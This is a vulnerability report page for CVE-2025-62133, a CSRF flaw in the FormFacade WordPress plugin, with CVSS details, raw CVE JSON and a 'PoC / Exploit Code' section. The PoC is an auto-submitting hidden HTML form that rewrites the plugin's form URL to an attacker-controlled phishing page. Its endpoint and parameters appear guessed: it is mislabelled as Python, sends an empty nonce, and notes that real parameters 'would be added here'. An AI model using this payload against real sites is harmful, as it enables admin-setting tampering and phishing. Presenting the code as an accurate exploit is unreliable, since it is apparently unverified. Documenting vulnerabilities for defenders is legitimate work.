Security Vulnerability Report
中文
CVE-2025-62133 CVSS 4.3 MEDIUM

CVE-2025-62133

Published: 2025-12-31 16:15:46
Last Modified: 2026-04-23 15:34:36

Description

Cross-Site Request Forgery (CSRF) vulnerability in manidoraisamy FormFacade formfacade allows Cross Site Request Forgery.This issue affects FormFacade: from n/a through <= 1.4.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FormFacade插件 <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62133: FormFacade Plugin CSRF --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62133</title> </head> <body> <h1>CSRF PoC for FormFacade Plugin</h1> <p>This PoC demonstrates a CSRF vulnerability in WordPress FormFacade plugin <= 1.4.1</p> <script> // Auto-submit form when page loads window.onload = function() { document.getElementById('csrf-form').submit(); } </script> <!-- Malicious form targeting FormFacade plugin endpoint --> <form id="csrf-form" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Common FormFacade nonce bypass attempt --> <input type="hidden" name="action" value="formfacade_save_settings"> <input type="hidden" name="form_id" value="malicious_form"> <input type="hidden" name="form_url" value="https://attacker-controlled-site.com/malicious-form"> <input type="hidden" name="form_name" value="Phishing Form"> <!-- Additional plugin-specific parameters would be added here --> <input type="hidden" name="nonce" value=""> </form> <p>If you see this message, the form has been submitted.</p> <p>Target: WordPress site with FormFacade plugin <= 1.4.1</p> <!-- Alternative: Image-based GET request CSRF --> <!-- <img src="https://target-site.com/wp-admin/admin.php?page=formfacade&action=malicious_action" width="0" height="0"> --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62133", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.897", "lastModified": "2026-04-23T15:34:36.143", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in manidoraisamy FormFacade formfacade allows Cross Site Request Forgery.This issue affects FormFacade: from n/a through <= 1.4.1."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Manidoraisamy FormFacade permite la falsificación de petición en sitios cruzados. Este problema afecta a FormFacade: desde n/a hasta 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/formfacade/vulnerability/wordpress-formfacade-plugin-1-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}